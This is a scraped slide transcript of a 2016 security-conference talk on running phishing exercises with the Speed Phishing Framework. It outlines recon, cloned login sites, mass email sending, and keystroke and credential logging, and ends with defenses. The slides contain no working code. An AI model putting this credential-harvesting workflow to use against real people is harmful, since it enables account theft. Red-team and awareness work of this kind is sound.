hackcon - phishing- going from recon to creds - adam compton...spf -sending emails can simulate...
TRANSCRIPT
![Page 1: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/1.jpg)
Phishing:GoingfromRecontoCredsHackcon2016EditionAdamCompton
![Page 2: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/2.jpg)
Agenda
●TalkaLittleAboutMyself●WhatisPhishing?●AStandardPhishingProcess● SpeedPhishingDemo
https://github.com/tatanus/SPF
![Page 3: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/3.jpg)
AdamCompton
Father- 5yrsHusband-16yrsSecurityResearcher- 16yrsProgrammer- 34yrsHillbilly- 39yrs
@tatanushttps://github.com/tatanushttp://blog.seedsofepiphany.com/
[email protected][email protected]
https://github.com/tatanus/SPF
![Page 4: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/4.jpg)
WhatisPhishing?
"theattempttoacquiresensitiveinformation...bymasqueradingasatrustworthyentityinanelectroniccommunication."- Wikipedia(Phishing)
https://github.com/tatanus/SPF
![Page 5: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/5.jpg)
WhyPhish?
PotentialhighreturnoninvestmentMaybeeasiestwayonanetworkItworks!Peoplewanttobehelpful.
https://github.com/tatanus/SPF
![Page 6: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/6.jpg)
GoingBacktothe90s
“AOHell includesa''fisher''thatallowsausertoposeasanAOLofficialandasknewmembersforpasswordsorcredit-cardnumbers.”- SanJoseMercury1995
https://github.com/tatanus/SPF
![Page 7: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/7.jpg)
![Page 8: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/8.jpg)
Whatkindofsensitiveinfo?
CredentialsCreditCardsIdentity- PIIHealthInformationBitcoinWalletsSteamAccounts
https://github.com/tatanus/SPF
![Page 9: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/9.jpg)
TypesofPhishingAttacks
Attack Magnitude Targeting
Phishing Many General
SpearPhishing 10s- 100s Group,Company
Whaling One Executive
https://github.com/tatanus/SPF
![Page 10: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/10.jpg)
StandardPhishingProcess
https://github.com/tatanus/SPF
![Page 11: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/11.jpg)
Thelistoftargetsandanyotherinfothatwillhelp
Findthroughcompanysite,googlesearches,andevensocialmedia
Listmaybeprovidedbycustomer
https://github.com/tatanus/SPF
![Page 12: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/12.jpg)
ReconTools
https://github.com/tatanus/SPF
![Page 13: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/13.jpg)
Settingupweb,dns and/ormailservers
Createaconvincingscenario,writetheemail
Testtheentireprocess!
Thismaybeyouronlychancetofixissues
https://github.com/tatanus/SPF
![Page 14: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/14.jpg)
CredentialHarvesting =>LoginInformation
ExploitingClient =>MetasploitSessions
Thisstepisbasedonscopeofwork
https://github.com/tatanus/SPF
![Page 15: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/15.jpg)
AttackTools- SetuptoPostCompromise
https://github.com/tatanus/SPF
![Page 16: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/16.jpg)
Everyone’sFavoritePart!AtMinimum:•DescribetheAttackScenario•Targets•CollectedCredentialsorCompromisedSystemsIncludeStatistics
https://github.com/tatanus/SPF
![Page 17: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/17.jpg)
Iamlazy- Canwemakethiseveneasier?
Yes...Automation!
ProgramAPIs•BeEF RESTFul API•Recon-cli•SET- seautomateParseCommandlineToolOutputPython,Perl,&Bash
https://github.com/tatanus/SPF
![Page 18: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/18.jpg)
SpeedPhishingFramework- SPF
Automatescommontasksneededtoperformaphishingexercise
WritteninPython
Minimalexternaldependencies
https://github.com/tatanus/SPF
![Page 19: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/19.jpg)
CurrentFeatures
HarvestsEmailAddressSetups&HostsWebsitesSendsphishingemailstotargetsRecordsCreds andKeystrokesCreatesVERYSimpleReport
https://github.com/tatanus/SPF
![Page 20: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/20.jpg)
SPF- UsageStatement/Options
https://github.com/tatanus/SPF
![Page 21: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/21.jpg)
SPF- ConfigFile
https://github.com/tatanus/SPF
![Page 22: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/22.jpg)
SPF- StandardPhishingProcess
https://github.com/tatanus/SPF
![Page 23: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/23.jpg)
SPF- Reconnaissance
Searchesonlinesearchengineslike:◦Google,Bing,andDuckDuckGo
CanuseexternaltoolssuchastheHarvester
https://github.com/tatanus/SPF
![Page 24: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/24.jpg)
SPF- IdentifyingPotentialTargets
https://github.com/tatanus/SPF
![Page 25: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/25.jpg)
SPF- SetupandDeploy
Built-inwebserverbasedonTwistedpythonlibrary
Templated samplewebsiteswithaccompanyingemailtemplates
Abilitytodynamicallycloneadditionalloginportalsasneeded
https://github.com/tatanus/SPF
![Page 26: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/26.jpg)
SPF- LoadingWebSites
https://github.com/tatanus/SPF
![Page 27: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/27.jpg)
SPF- WebSites
https://github.com/tatanus/SPF
![Page 28: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/28.jpg)
SPF- SendingEmails
Cansimulatesendingofemails
Sendsemailsinaroundrobinstylealternatingacrossallphishingsites
Sendsemailsvia3rdpartySMTPserverorbyconnectingdirectlytothetarget'smailserver
https://github.com/tatanus/SPF
![Page 29: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/29.jpg)
SPF- SendingEmails
![Page 30: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/30.jpg)
SPF- CollectResponses&PostExploitation
LogsallaccesstothewebsitesLogsallformsubmissionsLogsallkeystrokes
Hasabilitytopillageemailaccounts
https://github.com/tatanus/SPF
![Page 31: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/31.jpg)
SPF- CollectingResults
https://github.com/tatanus/SPF
![Page 32: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/32.jpg)
Reports
SavesalldataandactivitylogstoassessmentspecificdirectorystructureGeneratessimpleHTMLreport
https://github.com/tatanus/SPF
![Page 33: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/33.jpg)
SPF- SimpleReport
![Page 34: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/34.jpg)
Advanced/ExperimentalFeatures
CompanyProfiler◦ Identifywhichifanytemplatesshouldbeused◦ Dynamicallygeneratenew"target-specific"phishing sitesPillage◦ Verifycredentials◦ Downloadattachments◦ Searchfor"SSN,password, login,etc…)
https://github.com/tatanus/SPF
![Page 35: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/35.jpg)
SPFDemo
Weshallallnowpraytothedemogods
https://github.com/tatanus/SPF
![Page 36: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/36.jpg)
FutureWork/Features
MoreexternaltoolsBetterProfiling/PillagingFancyReportsIncorporateSSL(possiblyviahttps://letsencrypt.org/).
Suggestions?
https://github.com/tatanus/SPF
![Page 37: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/37.jpg)
AHUGEThankYouto:
Recon-ng- TimTomes(lanmaster53)BeEF - WadeAlcorntheHarvester - ChristianMartorellaSocialEngineeringToolkit- DaveKennedyMorningCatch- RaphaelMudge
https://github.com/tatanus/SPF
![Page 38: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/38.jpg)
Defense
Preparation◦UserAwareness&PeriodicTesting
Detection&Analysis◦Alerts,MailProxies
Containment,EradicationandRecovery◦Haveaplanthatisreadyandtested
https://github.com/tatanus/SPF
![Page 39: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/39.jpg)
Defense
Preparation◦UserAwareness&PeriodicTesting
Detection&Analysis◦Alerts,MailProxies
Containment,EradicationandRecovery◦Haveaplanthatisreadyandtested
https://github.com/tatanus/SPF
![Page 40: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/40.jpg)
ThankYou!
![Page 41: HackCon - Phishing- Going from Recon to Creds - Adam Compton...SPF -Sending Emails Can simulate sending of emails Sends emails in a round robin style alternating across all phishing](https://reader035.vdocuments.us/reader035/viewer/2022071000/5fbcf3bcfd527f33581530b2/html5/thumbnails/41.jpg)
411
AdamCompton@tatanushttps://github.com/tatanushttp://blog.seedsofepiphany.com/[email protected][email protected]
https://github.com/tatanus/SPF